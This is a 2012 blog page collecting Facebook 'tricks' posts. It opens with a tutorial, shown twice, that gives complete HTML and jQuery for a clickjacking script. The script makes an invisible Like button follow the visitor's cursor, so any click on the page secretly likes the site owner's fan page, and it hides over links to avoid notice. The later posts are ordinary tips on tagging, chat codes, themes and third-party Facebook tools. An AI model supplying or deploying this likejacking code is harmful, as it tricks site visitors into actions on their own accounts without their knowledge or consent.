Showing posts with label Cool FaceBook tricks. Show all posts
Showing posts with label Cool FaceBook tricks. Show all posts

Automatically Increase Facebook Fans in Fan-page with Webpage Script

Friday, September 14, 2012 | comments (36)



Well today we have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just check below step by step tutorial.

1. Go to Blogger > Template > Edit HTML
2. Now just press Ctrl + F and search for </head> tag and paste the below script above it.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
         }
         function ClickJackFbShow(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
         }
 
</script>
3. Now again make a search for </body> tag and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>

4. Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.
REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :)

Well today we have found another simple to be applied script for your blogs or website which can gain few more unique likes to your facebook page, with this script applied any unique visitor who comes to your page can become your fan. He just needs to click anywhere on the webpage as a small invisible like button will follow his mouse cursor and as soon he clicks anywhere he will be liking your fan page. So now straight away jumping on how it can be applied in a webpage or blog just check below step by step tutorial.

1. Go to Blogger > Template > Edit HTML
2. Now just press Ctrl + F and search for </head> tag and paste the below script above it.
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'>
         function ClickJackFbHide(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).hide();
         }
         function ClickJackFbShow(){
            jQuery(&quot;div[id^=\&#39;clickjack-button-wrapper\&#39;]&quot;).show();
         }
 
</script>
3. Now again make a search for </body> tag and paste below code above it.
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)';  margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden"> 
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Fanpage URL Link&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe> 

   </div>
   <script type="text/javascript">
      jQuery( document ).ready( function() {
          $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
            jQuery( "#clickjack-button-wrapper-5" ).css( {
               top: e.pageY - 10,
               left: e.pageX + 30
            } );
         } );
                        clickjack_hider();
                        var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
      } );
                        function clickjack_hider(){
         jQuery("input").mouseout(function(){ClickJackFbShow();});
         jQuery("a").mouseout(function(){ClickJackFbShow();});
         jQuery("button").mouseout(function(){ClickJackFbShow();});
         jQuery("textarea").mouseout(function(){ClickJackFbShow();});
         jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});         jQuery("object").mouseout(function(){ClickJackFbShow();});
         jQuery("input").mouseover(function(){ClickJackFbHide();});
         jQuery("a").mouseover(function(){ClickJackFbHide();});
         jQuery("button").mouseover(function(){ClickJackFbHide();});
         jQuery("textarea").mouseover(function(){ClickJackFbHide();});
         jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});         jQuery("object").mouseover(function(){ClickJackFbHide();});
                        }
   </script>

4. Now just replace the red line in above code with your facebook page URL and that’s it now just save the template and jump over to your website to test it out.
Now as soon as you refresh your blog you will see that your cursor has been changed into the hand one as there is a link moving with it. Now your blog readers will see similar thing and ass soon as they will click it they will become your page fan.
REMEMBER There are some issues you might face using this script in your website or blog, the first thing is that when people drag they might not able to select the text as they will a semi visible Like button which will be attached to your mouse cursor as it moves, the second one some other gadgets might get affected and act weirdly, try using it if everything works ok than start increasing your fans :) 

How to Turn Your Timeline Into a Movie : Timeline Movie maker

Friday, July 20, 2012 | comments (20)

Facebook has completed its Eight successful years.When Facebook launched Timeline few of the facebook users were not satisfied with new design of their profile and they were finding ways to disable timeline.


As there is no such method provided by facebook that you can disable your Timeline but for Those who loveTimeline here is a Timeline movie maker.With the help of this you can create a video of your Timeline.

For those Who wants there old facebook Interface back Check this Post : How to get Old facebook back



For making Movie follow these steps : Goto Timeline movie maker

Login With your facebook profile:


Allow Permission To app:



Wait For few Minutes:



Finally,Watch Your Timeline movie : 

Only Your Friends can Watch your Timeline Movies.

P.S : You can Edit your Movie and Remake it by removing unwanted tagged pics.You can also change music of it.

How To Get Free Facebook Credits and also Make Money Online

| comments (25)



Well last week I Posted About a App named buddypoke On facebook.And After that I posted About the facebook credits How can we Use them and How to Buy them from facebook.

"But as all of the facebook users are Teens and college going students so It is not possible to spent our money on such apps for credits so Here I found a Site where you can Earn Facebook credits as well as many other products and free offers so get ready to Enjoy your Online freedom."




I’m going to introduce a site for you to get free Facebook CreditsBefore teaching you how to get free Facebook Credits in this way, I want to first tell you that you could only register ONCE in this site. Do NOT ever want to cheat in this site, or you’ll get banned! I suggest you to read the terms of the site carefully in order to familiar with the site.


1. Access The Site Here. You should see a SIGN UP box near the top/middle of the page. Enter your email address (*remember to use a VALID email) and click sign up. Fill in all other information tocomplete the process.

2. Confirm Your Email Address. Go to your email inbox which you’ve provided in the sign up process. You should see an email sent from the site (if not, just wait a while). Click the confirmation link in the email. After that, you should see 250 points bonus in your account! (if you do not confirm your email, you won’t receive the points!)


3. Go To The Site Section: Earn Points  Free Offers. (the navigation bar is at the top of the site) After clicking free offers, a list of offers will be shown up and each offer would have several details including: the amount of points you will earned after completion, approved times, approval rate, approval time and offer description.


You can choose all the offers which you’re interested in to complete, but I suggest you to choose offers which has the HIGHEST AMOUNT OF POINTS with HIGH or VERY HIGH approval rate and FAST approval time to complete first (just like the one I display here). You may need to take some time to complete these offers but it shouldn’t take long. After completing the offer, you should receive your points very quickly. You can continue to complete the next offer and earn more points!

4. Redeem Free Facebook Credits or Other Prizes. Go to the site section: Spend Points → Redeem Your Points. After you’ve earned enough points for free Facebook Credits or other prizes, simply go to the redeem section to redeem your prize. For Facebook Credits, it’s under the category ‘Gift Cards’. There are 3 different amounts of Facebook Credits you can redeem – $15, $25 or $50. After you’ve claimed your redemption, the free Facebook Credits should be emailed to you within minutes!

5. Visit the site frequently to earn more free rewards. Take some time to look around the site thoroughly. You’ll find there’re many rewards you could earn and there’re many simple and interesting tasks for you to complete! You could also chat and make friends with the members (or ask questions if needed) by typing in the shoutbox in the right hand side of the site or going to the Forum of the site.

How To Tag People on Facebook Status or Wall Posts

Saturday, June 30, 2012 | comments (107)

 Posted on 04. Jan, 2012 by Facebook Trick Team in Facebook Basics, Facebook Trick
Yes, it is possible to ‘tag’ people people on Facebook. Like other features, you can tag your friends in your Facebook Status or Wall posts like you do in  your uploaded photos. This option provided by Facebook is much similar to Twitter tagging. This tagging option lets you tell people about whom you’re telling about. This not only gives your viewers’ a clear idea about whom you’re talking about but also leaves a URL, which is great.
In this Facebook Trick, you’ll get two simple but unavoidable  steps to tag people on Facebook.

facebook tagging
facebook tagging
Step#1: Mention ‘@’
While writing something in your status, mention ‘@’ sign which is to be followed by the name of the person whom you’re tagging. If the person whom you’re tagging has an active Facebook Account, then you can tag easily.
Step#2: Select the name from the drop-down menu.
When you type the ‘@’- sign, you should write the first one or two letters of the name of the person about whom you’re talking about. Then in a drop-down menu, you will see names from your friend list starting with that one or two letters. After you chose one, the profile name of the person with his FB profile link will appear in your status after that ‘@’ sign.
Bonus Tip: Yes, multi tagging is possible too.
Tags: facebook tag, facebook trick, tags

View the original article here

Create Your Own Facebook chat codes

Friday, June 29, 2012 | comments (46)

How to create Picture code for showing any Pictures in Facebook ChatBox?

Example ==========>>>>>>>>>>



Follow this Steps .:

1.  Go to www.smileyti.me.

2. Click on "Browse" and select your picture.

3. Enter captcha code.

4. Click on "Upload Now"


5. Now they gives you code , just copy it and paste in FB Chat Box.



You can create thousands of Face Book chat codes instead of using usual codes!





 www.Smileyti.me


Enjoy!! & Leave a comment..

Essential Facebook tips and tricks

| comments (15)

Almost half of all the sharing that happens online is done on Facebook. This in itself is testament enough that Facebook does the job of connecting people fairly well. However, there are some tips and tricks that can allow you to get more out of Facebook and this article contains a list of some of the best such Facebook tips.

Facebook Tricks
Stop Hackers on Facebook
Are you worried about hackers hacking your Facebook account and posting stuff you don't want them to? Just read the linked post to protect yourself from most basic hacks.

Change Facebook's Theme
Are you bored with the default blue colored Facebook theme and want to get rid of it? Go change it to something super cool in Firefox.

Minimalist Facebook Theme Tricks
Facebook Galaxy Theme
Post an Empty/ Blank Status
Are you tired of constantly thinking new and interesting status updates for your Facebook friends? Then, post an empty status and show your friends that you denounce the thinking that if your status isn't cool, you aren't either. Just go to Facebook, hold Alt and press 0, 1, 7 and 3 respectively and click Post. This will post the null character as your status which basically is an empty space. Laptop users can do this after activating the Number Lock.
Facebook Tricks, Tips, Hacks
This is how the empty status looks like.
Subscribe to the RSS feed of your Notifications 
Go to Facebook's notifications page and click on the RSS link to find the RSS feed containing all your recent notifications. You can then subscribe to this feed in any desktop based RSS reader to instantly know when a new notification occurs.

Change Facebook's Posted via text
Have you noticed that when you update your Facebook status from a mobile, Facebook adds a "Posted via Mobile" link at the bottom of it? You can change that to say hilarious things like "via Carrier Pigeon" or "via My Bedroom." To do this, just go to PostedVia, choose a delivery option and update your status or post to a friend's wall.
Facebook Tips and Tricks
 I posted this status from the unreleased iPhone 5 ;) 

Know when friends Unfriend you
Facebook notifies you when someone adds you as a friend but Facebook does not notify you when someone unfriends you. If you wish to access this data, you can use Social Fixer Facebook extension, which will not only allow you to do this but a lot more too.
Facebook Tricks Unfriends

Update Facebook Status from Firefox
FireStatus is a Firefox addon that allows you to instantly update your Facebook status without having the need to visit Facebook again and again.

Facebook Firefox

Use Dynamic Facebook Profile Links to Fool your Friends
This is a funny use of technology to have fun with your friends. Just say some mean things in your status and then include this link -> www.facebook.com/profile.php?=1233445566. This may look like a link to a specific person's Facebook profile but in reality, it redirects users to their own profile. This happens because of the missing 'id' parameter. You can change the numbers to anything you like.

Facebook Tricks Search
Find Exactly What you are looking for on Facebook
If you ever had trouble finding a friend or a specific post by one of your friend, you should definitely take a look at the Facebook page on searching. It will help you to get acquainted not only with how Facebook search works but also enable you to get the most out of it.

Facebook Notifications Tricks
Access Facebook Chat on Your Desktop
Have you ever wanted to chat with your Facebook friends without opening a web browser? Desktop based applications like Digsby and ChitChat can allow you to stay connected with all your friends even when you close your web browser. This is much similar to chatting with Yahoo! Messenger or Google Talk chat client.




Original

20 Cool Facebook Tips and Tricks !!!

Thursday, June 14, 2012 | comments (10)

facebook tips tricks 20 Facebook Tips/Tricks You Might Not Know

If you surf Facebook on daily basis or occasionally, chances are you’re already familiar with regular stuffs like add/delete friends, update statuses, walls and profile, add and explore pages & applications, etc, but there’s more..
This week we want to cover some interesting things you can do on (or with) Facebook; inclusive of tricks that are not documented or unknown to many, as well as tips to stay connected better with your friends. Without further ado, here’s 20 Facebook Tips/Tricks You Might Not Know. If you have interesting tips/tricks related to Facebook, please feel free to share in the comment box below.
  1. How To Place Facebook Chat On Firefox Sidebar

    If you are using Firefox, you can place the Facebook Chat at the sidebar.
    Facebook Chat Firefox Sidebar 20 Facebook Tips/Tricks You Might Not Know
  2. How To Download Facebook Photo Albums

    FacePAD: Facebook Photo Album Downloader allows you to download your friends’ facebook albums, Events albums, and Group Albums, en masse, with the click of a button.
    facepad 20 Facebook Tips/Tricks You Might Not Know
  3. How To Share Flickr Photos To Facebook

    Flickr2Facebook is an unofficial Flickr to Facebook uploader(bookmarklet) which allows you upload photos to Facebook from Flickr.
    flickr2facebook 20 Facebook Tips/Tricks You Might Not Know
  4. How To Update Facebook Without Using Facebook

    hellotxt and Ping.fm both introduced features that let Facebook administrators update Facebook Pages.
    hellotxt 20 Facebook Tips/Tricks You Might Not Know
  5. How To Schedule Facebook Messages

    Sendible lets you schedule Facebook messages ahead of time so you can send messages to your friends, customers or colleagues in the future.
    sendible 20 Facebook Tips/Tricks You Might Not Know
  6. How To "Friend" Someone On Facebook & Hide It From Your Status Updates

    A short tutorial on Makeuseof to guide you how to hide Facebook status updates and keep that fact confined to your closer friends.
    hide status 20 Facebook Tips/Tricks You Might Not Know
  7. How To Create A Photo Collage Using Pictures Of Your Facebook Friends

    Click on Friends tab. Proceed to More tab. From "Choose an option" dropdown, choose any of the dashes "" . Your Facebook friends collage is right on your computer screen.
    photo collage 20 Facebook Tips/Tricks You Might Not Know
  8. How To Know When Facebook Friends Secretly Delete Or Block You

    This service has been discontinued. X-Friends is a unique tool for tracking friends that disappear from Facebook.
    X friends 20 Facebook Tips/Tricks You Might Not Know
  9. How To Display Selected Pictures Only On Your Facebook Profile Page

    A little-known feature in Facebook that lets you decide who shows up in that Friends box. Click that "edit" pencil in your Friends box and type the names of your best friends in the box that says "Always show these friends"
    friend photos 20 Facebook Tips/Tricks You Might Not Know
  10. How To Remove Facebook Advertisements

    This Greasemonkey script – Facebook: Cleaner removes many of the annoying ads and updates that unavoidably appear on your Facebook pages.
    ads 20 Facebook Tips/Tricks You Might Not Know
  11. How To Syncs Photos Of Facebook Friends With Contacts In Microsoft Outlook

    OutSync is a free Windows application that syncs photos of your Facebook friends with matching contacts in Microsoft Outlook. It allows you to select which contacts are updated. So you can update all contacts at once or just a few at a time.
    outsync 20 Facebook Tips/Tricks You Might Not Know
  12. How To Display Facebook Statuses On WordPress Blog

    The following method make use of Facebook status feed and WordPress RSS widget to display Facebook Statuses on WordPress blog.. It will also work for self-host WordPress blogs.
    statuses 20 Facebook Tips/Tricks You Might Not Know
  13. How To Post Your Blog Posts To Your Facebook Wall Automatically

    Wordbook allows you to cross-post your blog posts to your Facebook Wall. Your Facebook “Boxes” tab will show your most recent blog posts.
    wordbook 20 Facebook Tips/Tricks You Might Not Know
  14. How To Access Facebook Chat On Desktop

    Gabtastik and digsby let you keep Facebook chat sessions open on your Windows desktop outside of your regular web browser, using minimal screen real estate and system memory.
    gabtastik 20 Facebook Tips/Tricks You Might Not Know
  15. How To Create Quiz On Facebook Easily

    LOLapps provides quiz creator that can be employed to conjure up these popular personality quizzes that are so widespread in Facebook.
    lolapps 20 Facebook Tips/Tricks You Might Not Know
  16. How To Hide Your Online Status On Facebook Chat From Select Contacts

    Facebook has integrated friends list with Chat and you can also choose which of these list members get to see you online.
    hide 20 Facebook Tips/Tricks You Might Not Know
  17. How To Get Facebook Updates On Email

    NutshellMail consolidates your Facebook accounts through the inbox you use the most.
    nutshellmail 20 Facebook Tips/Tricks You Might Not Know
  18. How To Update Facebook Status From Firefox

    FireStatus is a status update utility for multiple social networks, including FaceBook.
    firestatus 20 Facebook Tips/Tricks You Might Not Know
  19. How To Get Facebook On Your Desktop

    Seesmic DesktopFacebookerXobniFacebook Sidebar GadgetScrapboy and Facebook AIR application are desktop applications that allows you interact with your stream just as you would on Facebook, but without the browser.
    desktop apps 20 Facebook Tips/Tricks You Might Not Know
  20. How To Delete, Cancel And Terminate Facebook Account And Profile

    A simple guide to terminate, delete or cancel Facebook account, together with the Facebook profile easily.
    terminate 20 Facebook Tips/Tricks You Might Not Know

    Credits : Hongkiat


 
Support : Sanjaya Einy | Blogger Tricks Templatee
Copyright © 2011. Tips and Tricks NET - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Premium Blogger Template